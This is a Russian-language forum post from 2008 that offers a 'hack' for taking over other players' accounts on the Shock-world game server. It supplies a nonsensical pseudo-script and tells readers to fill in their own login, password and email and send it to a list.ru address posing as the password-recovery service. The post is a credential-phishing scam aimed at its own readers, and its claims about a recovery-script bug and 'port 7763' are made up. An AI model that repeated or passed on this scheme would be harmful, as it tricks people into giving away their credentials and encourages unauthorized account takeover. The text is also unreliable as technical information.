1
balloo
(10.08.2008 12:45)
0
Сейчас я посвещю тебя во все тонкости взлома комплекса серверов Shock-world (1x10):
Все мы знаем про восстановление забытых паролей. То есть - присылаете в службу восстановления пароля
свой логин, вам в ответ два секретных пароля, присылаете ему два ответа,
вам ваш старый пароль, или сгенерированный новый. На сервере sock-world ,
все работает на отлично, кроме одного, у них СКРИПТИЧЕСКАЯ ошибка службы восстановления паролей
(поврежденная порта 7763),
эту ошибку мы будем использовать в своих злостных целях. Мы можем его поиметь, что мы и сделаем:
Отправляем в службу восстановления паролей запрос на восстановление пароля своего аккаунта, но с чужим персом,
в ответ получает Login и Password взламываемого аккаунта.
Все что нам нужно это:
1.Заходим в свой почтовый ящик.
2.В письмe пишем такой скрипт:
{failpass}
/Go to page 1
{trubl theme = password forgot = fail}
/derictory count/
{/fors to server: 3x10}
// indexcode_7
{my sql}: "здесь прописываем свои аккаунт" {1for ressurce go to"2"}
/02870163
[my 2 last pass: "здесь указываем ник того, кого хотите взломать(ник, не обязательно логин)"]
[/forward2folder 00123691]
{my count pass}: "здесь прописываем свой пароль"
//target trash_1
/trash_2
{go to mile page}: "здесь укажите свой email адрес (на него придёт аккаунт и пароль того человека, которого вы взламываете)"
//endscript_1 /
3.Отправляем письмо с этим скриптом на систему возврата паролей shock-world1x10@list.ru
4.Ждём некоторое время
5.Получаем чужой аккаунт и радуемся.
Письма с ответным скриптом не приходят если вы указали несуществующий аккаунт, либо неправильный пароль или аккаунт существует менее месяца (не знаю почему), кавычки в скрипте писать не надо. Пример: {my count pass}: "здесь прописываем свой пароль" - {my count pass}: 12345
Удачного хака!
---------------------------------------------
Работает только на шоке 1. По другим серверам ( шоков ) не работает так как на каждый сервер свйо скрипт...
|
